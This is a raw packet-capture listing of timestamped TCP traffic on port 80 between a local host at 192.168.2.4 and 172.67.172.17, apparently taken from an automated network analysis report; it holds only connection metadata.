                                                                                                              Feb 25, 2021 15:09:59.962528944 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.962569952 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.963298082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963326931 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963350058 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963370085 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.963390112 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963411093 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.963426113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963449955 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963471889 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.963485003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.963541985 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.964195967 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964227915 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964250088 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964272976 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964287043 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.964310884 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964320898 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.964342117 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964364052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.964397907 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.965132952 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965164900 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965188980 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965202093 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.965226889 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965239048 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.965255976 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965280056 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965298891 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.965312958 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.965361118 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.966084003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966114044 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966135979 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966160059 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966173887 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.966197968 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966208935 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.966228962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966248989 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.966270924 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.966985941 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967006922 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967022896 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967037916 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967047930 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.967068911 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.967075109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967093945 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967144012 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.967808008 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967844963 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967876911 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967884064 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.967907906 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967921972 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.967945099 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967967987 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.967993975 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968002081 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.968050003 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.968786955 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968821049 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968842983 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968863964 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968884945 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.968899965 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968920946 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.968933105 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968956947 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.968988895 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.969713926 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969733953 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969748974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969764948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969778061 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.969795942 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969801903 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.969819069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969835043 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.969842911 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.969880104 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.970629930 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970659018 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970690012 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970705032 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970720053 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970738888 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.970757961 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970773935 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.970789909 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.970824003 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.971416950 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971446037 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971467018 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971484900 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.971504927 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971515894 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.971540928 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971565962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971576929 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.971597910 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.971652031 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.972290039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972320080 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972337008 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972357988 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972369909 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.972393036 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972404957 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.972426891 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972450018 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.972474098 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.973153114 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.973200083 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.973220110 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.973234892 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.973257065 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.973275900 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.973289967 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.973344088 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.051585913 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.104238033 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181399107 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181457043 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181479931 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181503057 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181526899 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181548119 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181570053 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181595087 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181622028 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181647062 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181663990 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.181685925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.181792021 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.208782911 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.208856106 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.208880901 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.208908081 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.208952904 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.208976984 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209000111 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209023952 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209034920 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209057093 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209083080 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209109068 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209134102 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209156990 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209180117 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209188938 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209213972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209238052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209247112 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209269047 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209294081 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209306955 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209327936 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209351063 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209366083 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209402084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209430933 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209438086 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209460974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209476948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.209486008 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.209534883 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241314888 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241499901 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241552114 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241578102 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241600037 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241626024 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241650105 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241687059 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241707087 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241729975 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241751909 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241764069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241786003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241799116 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241816044 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241843939 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241852999 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241874933 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241892099 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241914988 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241923094 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.241945028 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241969109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.241986990 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242000103 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242022991 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242047071 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242070913 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242078066 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242103100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242125034 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242131948 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242152929 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242175102 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242185116 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242209911 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242228985 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242242098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242264986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242285967 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242307901 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242322922 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242341042 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242363930 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242386103 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242396116 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242419958 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242441893 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242454052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242480040 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242501974 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242531061 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242546082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242568970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242593050 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242602110 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242625952 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242635012 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242656946 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242681026 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242698908 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.242706060 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.242768049 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274502993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274533033 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274554014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274579048 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274600983 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274616957 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274640083 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274662018 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274686098 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274699926 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274725914 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274748087 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274761915 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274787903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274811029 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274827003 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274852991 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274869919 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274888992 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274913073 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274933100 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.274971962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.274996042 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275027037 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275304079 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275326967 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275346994 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275366068 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275384903 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275402069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275430918 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275454044 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275476933 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275509119 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275532961 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275549889 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275566101 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275587082 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275607109 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275618076 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275641918 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275659084 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275679111 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275702953 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275727987 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275744915 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275770903 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275785923 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275809050 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275832891 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275855064 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275892973 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275916100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275938034 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.275949001 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275969982 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.275990009 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276005030 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276047945 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276058912 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276082993 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276124954 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276443005 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276468039 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276492119 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276513100 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276525974 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276554108 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276580095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276604891 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276629925 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276648045 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276664972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276690960 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276711941 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276721954 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276746035 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276767969 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276779890 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276803970 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276820898 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276839972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276864052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:00.276879072 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:00.276899099 CET8049722172.67.172.17192.168.2.4
